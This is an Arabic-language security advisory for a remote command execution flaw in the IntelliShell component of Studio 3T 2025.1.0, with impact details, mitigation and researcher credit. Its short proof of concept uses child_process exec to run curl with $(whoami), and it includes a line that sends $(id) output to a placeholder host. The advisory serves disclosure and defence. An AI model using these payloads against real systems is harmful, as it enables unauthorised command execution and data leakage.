
Studio 3T الإصدار 2025.1.0
البرنامج: Studio 3T v.2025.1.0
تقرير الثغرة: تنفيذ أوامر عن بُعد في Studio 3T
نظرة عامة ثغرة حرجة في Studio 3T الإصدار 2025.1.0 والأقدم تتيح لمهاجم عن بُعد تنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة بعناية تستغل وحدة child_process في مكوّن IntelliShell.
التفاصيل نوع الثغرة: تنفيذ أوامر عن بُعد المنتج المتأثر: Studio 3T، الإصدار <= 2025.1.0 المكوّن المتأثر: IntelliShell نوع الهجوم: عن بُعد التأثيرات: تنفيذ التعليمات البرمجية: نعم رفض الخدمة: نعم تصعيد الامتيازات: نعم
الوصف تمكّن هذه الثغرة مهاجمًا عن بُعد من تنفيذ أوامر نظام تشغيل عشوائية عن طريق إرسال حمولة JavaScript خبيثة عبر IntelliShell، مستغلاً وحدة child_process. تُعد هذه ثغرة تنفيذ أعمى، أي أنه لا يتم إرجاع أي مخرجات مباشرة إلى المهاجم. متجه الهجوم
إنشاء اتصال بمثيل MongoDB. إرسال حمولة JavaScript خبيثة عبر IntelliShell تستخدم وحدة child_process لتنفيذ أوامر نظام تشغيل عشوائية.
إثبات المفهوم للتحقق من الثغرة، اتبع الخطوات التالية:
قم بإعداد خادم HTTP محلي:
python3 -m http.server 80
نفّذ حمولة JavaScript التالية في IntelliShell:
const {exec} = require('child_process');
exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));
بدلاً من ذلك، استخدم الأمر التالي كمتجه للتحقق:
curl http://site/$(id)
المراجع
التخفيف المستخدمون: قم بالترقية إلى إصدار مصحح من Studio 3T (إن توفر) أو تجنب استخدام IntelliShell مع اتصالات MongoDB غير الموثوقة. البائعون: قيّدوا أو عقمّوا المدخلات إلى وحدة child_process في IntelliShell لمنع تنفيذ الأوامر غير المصرح به.
شكر وتقدير تم اكتشاف هذه الثغرة والإبلاغ عنها بواسطة Kaio Mendonca Pereira.